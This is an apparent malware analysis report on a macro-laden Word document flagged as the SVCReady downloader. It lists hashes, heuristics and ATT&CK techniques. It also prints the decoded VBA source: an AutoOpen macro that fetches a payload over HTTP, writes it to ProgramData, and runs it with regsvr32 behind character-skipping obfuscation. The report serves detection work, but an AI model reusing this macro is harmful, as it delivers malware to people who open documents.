Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 67f04eff930119f5…

MALICIOUS

Office (OOXML)

Size: 113.5 KB
Created: 2020-07-20 08:48:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-09-07
MD5: b70c4066769b85e4a74ac8616940f15e
SHA-1: 60df2017abad01de0a812c0065fe3e14634b170a
SHA-256: 67f04eff930119f5a70814d008dd971e8a868e3bca17756fa07af254a802d0ba
Risk Score: 270

Malware Insights

MITRE ATT&CK
  • T1059.005: Visual Basic
  • T1204.002: Malicious File

The sample is a malicious Office document containing VBA macros. The AutoOpen macro utilizes WScript.Shell to execute a command, likely downloading and running a second-stage payload. The obfuscated string 'cb:7\8pbrdoeg8r9a1m5d1a5t6a2\7506d253d67.bj1pfgf' is passed to the exec function, indicating a downloaded payload. The presence of an external relationship to 'file:///C:\Framework\rels\builds\pack1\us.jpg' is also noted.

Heuristics (8)

  • ClamAV: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    e2144357 ff24bb68(c11ee1b4), aaa1680c
    Set cd52c2ab = CreateObject("wscript.shell")
    Call cd52c2ab.exec(d4ed51c9 & " " & ff24bb68(c11ee1b4))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    e2144357 ff24bb68(c11ee1b4), aaa1680c
    Set cd52c2ab = CreateObject("wscript.shell")
    Call cd52c2ab.exec(d4ed51c9 & " " & ff24bb68(c11ee1b4))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
    Sub AutoOpen()
    Dim da9de17f As New d9a57f13
  • External relationship high OOXML_EXTERNAL_REL
    External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack1\us.jpg
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 3405 bytes
SHA-256: 58a2e2719125c59e1663f8fdb23cc188245efcb91379810dbc303ae3cc31a702

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "c6ba3237"
Public Const c11ee1b4 As String = "cb:7\8pbrdoeg8r9a1m5d1a5t6a2\7506d253d67.bj1pfgf"
Function b95c28b3()
b95c28b3 = ActiveWindow.Visible
End Function
Function c24a9531()
c24a9531 = ActiveWindow.Parent
End Function
Sub AutoOpen()
Dim da9de17f As New d9a57f13
aaa = ff24bb68(dbbb5f26)
aaa1680c = da9de17f.c0937b2d(aaa, "")
e2144357 ff24bb68(c11ee1b4), aaa1680c
Set cd52c2ab = CreateObject("wscript.shell")
Call cd52c2ab.exec(d4ed51c9 & " " & ff24bb68(c11ee1b4))
End Sub

Attribute VB_Name = "d580001f"
Function cd44ba6d()
cd44ba6d = ActiveWindow.DisplayLeftScrollBar
End Function
Function f9342700()
f9342700 = Application.ActiveDocument.CurrentRsid
End Function
Sub e2144357(e393d48f, b6ab704d)
Dim eebd721b
eebd721b = FreeFile
Open e393d48f For Output As #eebd721b
Print #eebd721b, fa6c18a0(b6ab704d)
Close #eebd721b
End Sub
Function b3124bf4(ce31bb28, a0b00da4)
b3124bf4 = Mid(ce31bb28, a0b00da4, 1)
End Function
Function e912391b()
e912391b = Application.ActiveDocument.AutoHyphenation
End Function
Function a650ee96()
a650ee96 = ActiveWindow.DisplayHorizontalScrollBar
End Function
Function ff24bb68(b06a1bf6)
For a0b00da4 = 1 To Len(b06a1bf6) Step 2
ac5c4d59 = ac5c4d59 & b3124bf4(b06a1bf6, a0b00da4)
Next
ff24bb68 = ac5c4d59
End Function
Function cd9ba679()
cd9ba679 = 217
End Function
Function ef4a8c0a()
ef4a8c0a = ActiveWindow.WindowState
End Function
Sub b1a8861e()
End Sub
Function ed95979d()
ed95979d = ActiveWindow.Type
End Function
Function ec3fd99a()
ec3fd99a = ActiveWindow.DisplayScreenTips
End Function
Function fa6c18a0(b6ab704d)
fa6c18a0 = StrConv(b6ab704d, 64)
End Function
Function b6cce54c()
b6cce54c = ActiveWindow.Left
End Function
Function e08db292()
e08db292 = -66742202
End Function
Function dbbb5f26()
dbbb5f26 = ActiveDocument.Shapes(1).AlternativeText
End Function
Function a25c7873()
a25c7873 = ActiveWindow.Visible
End Function
Function d279417a(b443b024 As Long) As Long
Dim e6b6341b As Long
For e6b6341b = 11 To 68
b443b024 = b443b024 + e6b6341b
Next e6b6341b
d279417a = b443b024
End Function
Function d4ed51c9()
d4ed51c9 = ff24bb68("r7e1g0s0v6r93b29")
End Function

Attribute VB_Name = "d9a57f13"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function c5a50d13()
c5a50d13 = ActiveWindow.HorizontalPercentScrolled
End Function
Function ab96b2aa()
ab96b2aa = Application.ActiveDocument.ChartDataPointTrack
End Function
Function c0937b2d(b89ef127, fcee294c)
Dim bb14ae16 As Object
Set bb14ae16 = New MSXML2.XMLHTTP60
Call bb14ae16.Open("GET", b89ef127, False)
bb14ae16.Send
c0937b2d = bb14ae16.responsebody
End Function
Function c8a3c086()
c8a3c086 = Application.ActiveDocument.Content
End Function
Function ee6dd425()
ee6dd425 = Application.ActiveDocument.ActiveWindow
End Function
Function b5785f4e(f2a047cb)
End Function

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 23552 bytes
SHA-256: 20d34bd9215d6a23d6e0b8395daff5906d1bc060076b2dce3c644673f2a41d7e